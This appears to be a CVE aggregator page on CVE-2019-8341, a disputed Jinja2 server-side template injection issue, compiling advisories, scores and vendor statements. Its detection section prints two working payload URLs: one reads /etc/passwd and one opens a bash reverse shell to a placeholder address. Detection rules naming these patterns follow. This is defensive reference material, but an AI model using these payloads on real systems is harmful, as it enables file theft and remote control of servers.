CVE-2019-8341
published 2019-02-15CVE-2019-8341: An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a…
PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
44.78%
98.6th percentile
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | jinja2 | — | — |
| opensuse | leap | — | — |
| opensuse | leap | — | — |
| pocoo | jinja2 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}↗
urlhttp://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}↗
- →Detect SSTI payloads in HTTP query parameters by looking for Jinja2 template expression delimiters {{ }} in URI/request values, particularly in parameters like 'username'. ↗
- →Monitor for Python MRO/subclass traversal patterns in HTTP parameters indicative of SSTI exploitation: ''.__class__.__mro__[2].__subclasses__()[40] ↗
- →Detect reverse shell attempts via Jinja2 SSTI using config['RUNCMD'] with bash TCP redirection in template injection payloads. ↗
- →Flag use of Jinja2.from_string() where the 'source' parameter is derived from user-controlled input (e.g., request.values.get()) without sandboxing — this is the vulnerable code pattern. ↗
- ·This CVE is disputed by the Jinja2 maintainers and multiple vendors (Red Hat, Pallets project). The behavior is considered expected/by-design: Jinja2 does not guarantee safe handling of untrusted templates without sandboxing enabled. No patch exists or is planned. ↗
- ·Red Hat explicitly assessed all their products as 'Not affected' and considers the CVE assignment invalid. ↗
- ·Jinja2 maintainers submitted a REJECT request to MITRE; the CVE status is disputed. Detection rules targeting this CVE should be scoped to application-level misuse, not a framework vulnerability. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8LOW
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f6pv-j8mr-w6rr: ** DISPUTED ** An issue was discovered in Jinja2 2
ghsa_unreviewed·2022-05-13
CVE-2019-8341 [CRITICAL] CWE-94 GHSA-f6pv-j8mr-w6rr: ** DISPUTED ** An issue was discovered in Jinja2 2
** DISPUTED ** An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.
OSV
CVE-2019-8341: An issue was discovered in Jinja2 2
osv·2019-02-15·CVSS 9.8
CVE-2019-8341 [CRITICAL] CVE-2019-8341: An issue was discovered in Jinja2 2
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing
Red Hat
python-jinja2: command injection in function from_string
vendor_redhat·2019-02-14·CVSS 9.8
CVE-2019-8341 [CRITICAL] CWE-77 python-jinja2: command injection in function from_string
python-jinja2: command injection in function from_string
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing
Statement: Red Hat Product Security does not believe this CVE assignment is valid. To the best of our knowledge, Jinja2 does not make any guarantees about being able to safely handle untrusted data by default without sandboxing modes enabled.
Package: python-jinja2 (Red Hat Ceph Storage 2) - Not affected
Debian
CVE-2019-8341: jinja2 - An issue was discovered in Jinja2 2.10. The from_string function is prone to Ser...
vendor_debian·2019·CVSS 9.8
CVE-2019-8341 [CRITICAL] CVE-2019-8341: jinja2 - An issue was discovered in Jinja2 2.10. The from_string function is prone to Ser...
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
No detection rules found.
Bugzilla
CVE-2019-8341 python-jinja2: command injection in function from_string [fedora-all]
bugzilla·2019-02-15·CVSS 9.8
CVE-2019-8341 [CRITICAL] CVE-2019-8341 python-jinja2: command injection in function from_string [fedora-all]
CVE-2019-8341 python-jinja2: command injection in function from_string [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2019-8341 python-jinja2: command injection in function from_string [epel-all]
bugzilla·2019-02-15·CVSS 9.8
CVE-2019-8341 [CRITICAL] CVE-2019-8341 python-jinja2: command injection in function from_string [epel-all]
CVE-2019-8341 python-jinja2: command injection in function from_string [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versio
Bugzilla
CVE-2019-8341 python-jinja2: command injection in function from_string
bugzilla·2019-02-15·CVSS 9.8
CVE-2019-8341 [CRITICAL] CVE-2019-8341 python-jinja2: command injection in function from_string
CVE-2019-8341 python-jinja2: command injection in function from_string
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI.
Reference:
https://github.com/JameelNabbo/Jinja2-Code-execution
Discussion:
Created python-jinja2 tracking bugs for this issue:
Affects: epel-all [bug 1677655]
Affects: fedora-all [bug 1677654]
---
After a quick glance, this CVE doesn't seem valid. If you let a user inject data into an unsafe function, they can do unsafe operations. I'm trying to find this documented in jinja2. They do support sandboxing, so it seems like they're aware of it.
http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.htmlhttps://bugzilla.redhat.com/show_bug.cgi?id=1677653https://bugzilla.suse.com/show_bug.cgi?id=1125815https://github.com/JameelNabbo/Jinja2-Code-executionhttps://www.exploit-db.com/exploits/46386/http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.htmlhttps://bugzilla.redhat.com/show_bug.cgi?id=1677653https://bugzilla.suse.com/show_bug.cgi?id=1125815https://github.com/JameelNabbo/Jinja2-Code-executionhttps://www.exploit-db.com/exploits/46386/
2019-02-15
Published